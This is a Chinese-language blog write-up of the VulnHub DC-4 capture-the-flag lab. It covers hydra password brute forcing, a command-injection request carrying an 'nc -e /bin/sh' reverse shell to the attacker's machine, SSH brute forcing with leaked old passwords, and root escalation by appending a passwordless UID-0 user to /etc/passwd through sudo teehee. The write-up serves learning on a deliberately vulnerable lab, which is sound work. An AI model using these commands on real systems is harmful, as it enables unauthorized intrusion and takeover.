vulnhub-DC4笔记

发布于 2022-01-08  1678 次阅读

1.nmap -sP 192.168.0.103/24   老规矩上来扫描一下内网主机,确定靶机ip为192.168.0.151
好像也可以sudo arp-scan -l
2.nmap -A -p 1-65535 192.168.0.151 进行端口扫描22/80
3.dirb一下,发现没什么东西,进入80端口,提示用户名为admin
4.爆破密码可以burp也可以hydra
hydra我不会在这插个眼,回头会了再来hydra爆破,爆破密码/usr/share/john/password.lst;参考文章1234
搞了一下午莫名其妙的成功了,那就不用burp爆破了;hydra -l admin -P /usr/share/john/password.lst -f 192.168.0.151 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
5.爆破出来admin:happy,登录,进去开始摸索下,好像只能有命令执行漏洞
6.nc -lvp 4444   攻击机监听;
radio=nc+-e+/bin/sh+192.168.0.101+4444&submit=Run 靶机抓包,反弹shell,nc -e用于程序重定向
7.看了半天,就在/home/jim/backups/old-passwords.bak 发现了唯一有用的。旧密码,利用nc传回kali没成功,算了复制粘贴得了,重命名为passwd.txt
8.hydra -L /root/Desktop/user.txt -P /root/Desktop/passwd.txt ssh://192.168.0.100爆破出来的密码jim:jibril04
9.登录再/var/mail/jim看到了一个邮件知道了charles:^xHhA&hvim0y新的用户名密码
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles

10.登录成功sudo -l一下,发现/use/bin/teehee我们可以使用。 teehee --help一下看看这是啥命令。 teehee -a 好像可以追加信息,试试建立一个管理员$ echo "admin::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

11.成功建立一个最高权限者,su admin 切换用户,id 看看成功了吗,    cd /root下看看有没有flag。

参考文章

888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888

Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

收获

1.学会了hydra爆破

2.nc监听反弹shell,虽然传文件失败了

3. echo "admin::0:0:::/bin/sh" | sudo teehee -a /etc/passwd建立新的用户

子夜不哭
最后更新于 2022-01-08
啥也没有呀